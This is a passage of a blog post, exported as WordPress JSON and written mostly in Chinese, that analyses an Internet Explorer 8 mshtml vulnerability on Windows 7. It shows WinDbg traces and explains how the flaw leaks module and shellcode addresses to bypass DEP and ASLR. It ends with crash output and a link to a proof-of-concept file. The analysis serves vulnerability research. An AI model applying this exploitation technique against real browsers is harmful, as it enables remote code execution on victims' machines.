<\/div>\n
Breakpoint 1 hit<\/code><\/div>\n
<\/div>\n
eax=0066c830 ebx=00000000 ecx=005f4178 edx=0066c830 esi=6a758264 edi=6a758264<\/code><\/div>\n
<\/div>\n
eip=6a75a5e4 esp=020c8ab4 ebp=020c8ab4 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl nz na po nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000202<\/code><\/div>\n
<\/div>\n
mshtml!CDynamicCF::AddRef+0xb:<\/code><\/div>\n
<\/div>\n
6a75a5e4 8b4004\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax,dword ptr [eax+4] ds:0023:0066c834=00000001<\/code><\/div>\n
<\/div>\n
0066c830\u88ab\u8986\u76d6\u4e3a\u6307\u5411mshtml\u4e2d\u865a\u8868\u7684\u6307\u9488\u3002<\/code><\/div>\n
<\/div>\n
0:005> dd 0066c830<\/code><\/div>\n
<\/div>\n
0066c830\u00a0 6aadbdc8 00000001 6a775d74 005f4178<\/code><\/div>\n
<\/div>\n
0066c840\u00a0 6a7597d0 00000000 00000000 00000000<\/code><\/div>\n
<\/div>\n
0066c850\u00a0 03000030 00000000 2d117bc2 88000000<\/code><\/div>\n
<\/div>\n
0066c860\u00a0 6aadbdc8 00000001 6a775d74 00628600<\/code><\/div>\n
<\/div>\n
0066c870\u00a0 6a5e77d0 00000000 00000000 00000000<\/code><\/div>\n
<\/div>\n
0066c880\u00a0 03000047 00000000 2d117bd8 8c000000<\/code><\/div>\n
<\/div>\n
0066c890\u00a0 71d8436c 71d3a4dc 71d8c020 00010001<\/code><\/div>\n
<\/div>\n
0066c8a0\u00a0 00000000 71d4b540 00664058 00000000<\/code><\/div>\n
<\/div>\n
0:005> dds poi(0066c830) l5<\/code><\/div>\n
<\/div>\n
6aadbdc8\u00a0 6a78a5c1 mshtml!PlainDispatchQueryInterface<\/code><\/div>\n
<\/div>\n
6aadbdcc\u00a0 6a75a5d9 mshtml!CPeerEnumerator::AddRef<\/code><\/div>\n
<\/div>\n
6aadbdd0\u00a0 6a7578d5 mshtml!PlainRelease<\/code><\/div>\n
<\/div>\n
6aadbdd4\u00a0 6a76863f mshtml!TearoffThunk3<\/code><\/div>\n
<\/div>\n
6aadbdd8\u00a0 6a7905e0 mshtml!TearoffThunk4<\/code><\/div>\n
<\/div>\n
\u5f53\u83b7\u53d6index\u5c5e\u6027\u65f6\u7ed3\u679c\u7684VARIANT\u7ed3\u6784\u4f53\u7684\u503c\u6307\u5411JS\u5806\u4e0a\u6211\u4eec\u53ef\u4ee5\u63a7\u5236\u7684\u4e34\u65f6\u5bf9\u8c61\u3002<\/code><\/div>\n
<\/div>\n
00aab9a4\u00a0 \"index\"<\/code><\/div>\n
<\/div>\n
eax=6a7cc9d1 ebx=10000001 ecx=0205a310 edx=00aab9a4 esi=005eba30 edi=003f9758<\/code><\/div>\n
<\/div>\n
eip=6a7cc9d1 esp=0205a2a8 ebp=0205a2d4 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl zr na pe nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000246<\/code><\/div>\n
<\/div>\n
mshtml!PlainGetDispID:<\/code><\/div>\n
<\/div>\n
6a7cc9d1 8bff\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi,edi<\/code><\/div>\n
<\/div>\n
0:005> be 2<\/code><\/div>\n
<\/div>\n
0:005> g<\/code><\/div>\n
<\/div>\n
Breakpoint 2 hit<\/code><\/div>\n
<\/div>\n
eax=000003ed ebx=003f9758 ecx=6a77bb85 edx=00000002 esi=0205a1dc edi=00000000<\/code><\/div>\n
<\/div>\n
eip=6a77bb85 esp=0205a1b0 ebp=0205a1e8 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl zr na pe nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000246<\/code><\/div>\n
<\/div>\n
mshtml!PlainInvokeEx:<\/code><\/div>\n
<\/div>\n
6a77bb85 8bff\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi,edi<\/code><\/div>\n
<\/div>\n
0:005> dd esp<\/code><\/div>\n
<\/div>\n
0205a1b0\u00a0 66cfa26e 003f9758 000003ed 00000001<\/code><\/div>\n
<\/div>\n
0205a1c0\u00a0 00000002 0205a2b0 00aaf068 0205a2c0<\/code><\/div>\n
<\/div>\n
0205a1d0\u00a0 00aaf860 000003ed 005eba30 005eaf38<\/code><\/div>\n
<\/div>\n
0205a1e0\u00a0 00000000 005eb788 0205a224 66cfa1b9<\/code><\/div>\n
<\/div>\n
0205a1f0\u00a0 005eba30 000003ed 00000409 00000002<\/code><\/div>\n
<\/div>\n
0205a200\u00a0 0205a2b0 00aaf068 0205a2c0 00aaf860<\/code><\/div>\n
<\/div>\n
0205a210\u00a0 003f9758 005eba30 00aaf860 003f9758<\/code><\/div>\n
<\/div>\n
0205a220\u00a0 6a75b7e2 0205a2e4 66cfa43a 005eba30<\/code><\/div>\n
<\/div>\n
0:005> dd 00aaf068<\/code><\/div>\n
<\/div>\n
00aaf068\u00a0 00000000 00400c48 00aa6fe8 fff80000<\/code><\/div>\n
<\/div>\n
00aaf078\u00a0 00000080 00400c48 00aa6fd8 fff80000<\/code><\/div>\n
<\/div>\n
00aaf088\u00a0 00000000 00000000 00000000 00aaf2a8<\/code><\/div>\n
<\/div>\n
JS\u4e2d\u51fd\u6570\u8c03\u7528\u4e2d\u751f\u6210\u7684\u4e34\u65f6\u5bf9\u8c61\u4f1a\u4fdd\u7559\u5728\u5806\u4e0a\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7JS\u4ee3\u7801\u63a7\u5236JS\u5806\u3002\u5982\u4e0b\uff1a<\/code><\/div>\n
<\/div>\n
valuettgot13 = funhellokey(tempkktvalue + 0x0051e7db);<\/code><\/div>\n
<\/div>\n
\u6b64\u5904tempkktvalue + 0x0051e7db\u7684\u4e34\u65f6\u503c\u5c31\u4f1a\u653e\u5728\u5806\u4e0a\u3002<\/code><\/div>\n
<\/div>\n
\u56e0\u6b64\u901a\u8fc7\u8be5\u6f0f\u6d1e\u6211\u4eec\u53ef\u4ee5\u5b9a\u4f4d\u6211\u4eec\u7684shellcode\uff0c\u6700\u540e\u4e00\u4e2aonpropertychange\u5c5e\u6027\u83b7\u53d6\u5219\u4f1a\u89e6\u53d1shellcode\u8c03\u7528\u3002<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

4 \u6f0f\u6d1e\u5229\u7528<\/h2>\n

\u6309\u5982\u4e0a\u5206\u6790\u6b64exploit\u4e0d\u5229\u7528heap spray \u5373\u53efbypass DEP&ASLR\uff0c\u662f\u56e0\u4e3a\u83b7\u53d6\u4e86mshtml\u6a21\u5757\u5730\u5740\u548cshellcode\u5730\u5740\u3002<\/p>\n

5 Crash info<\/h2>\n
\n
\n\n\n\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n<\/td>\n
\n
\n
0:005> g<\/code><\/div>\n
<\/div>\n
(bc4.468): Access violation - code c0000005 (first chance)<\/code><\/div>\n
<\/div>\n
First chance exceptions are reported before any exception handling.<\/code><\/div>\n
<\/div>\n
This exception may be expected and handled.<\/code><\/div>\n
<\/div>\n
eax=a7c7bb98 ebx=00143990 ecx=01b73254 edx=000e1860 esi=01b7e520 edi=80020003<\/code><\/div>\n
<\/div>\n
eip=6a742ce6 esp=026a9ed4 ebp=026a9ee0 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ov up ei ng nz na po cy<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00010a83<\/code><\/div>\n
<\/div>\n
mshtml!`string'+0x6:<\/code><\/div>\n
<\/div>\n
6a742ce6 65007200\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 add\u00a0\u00a0\u00a0\u00a0 byte ptr gs:[edx],dh\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 gs:000e1860=03<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

6 POC<\/h2>\n

 <\/p>\n

http:\/\/www.80vul.com\/ie8\/win7\/sc.txt<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

\u6765\u6e90\uff1ahttp:\/\/blog.vulnhunt.com\/index.php\/20 …<\/p>\n

\u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[177],"class_list":["post-773","post","type-post","status-publish","format-standard","hentry","tag-177"],"views":1277,"_links":{"self":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/773","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/comments?post=773"}],"version-history":[{"count":0,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/773\/revisions"}],"wp:attachment":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/media?parent=773"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/categories?post=773"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/tags?post=773"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}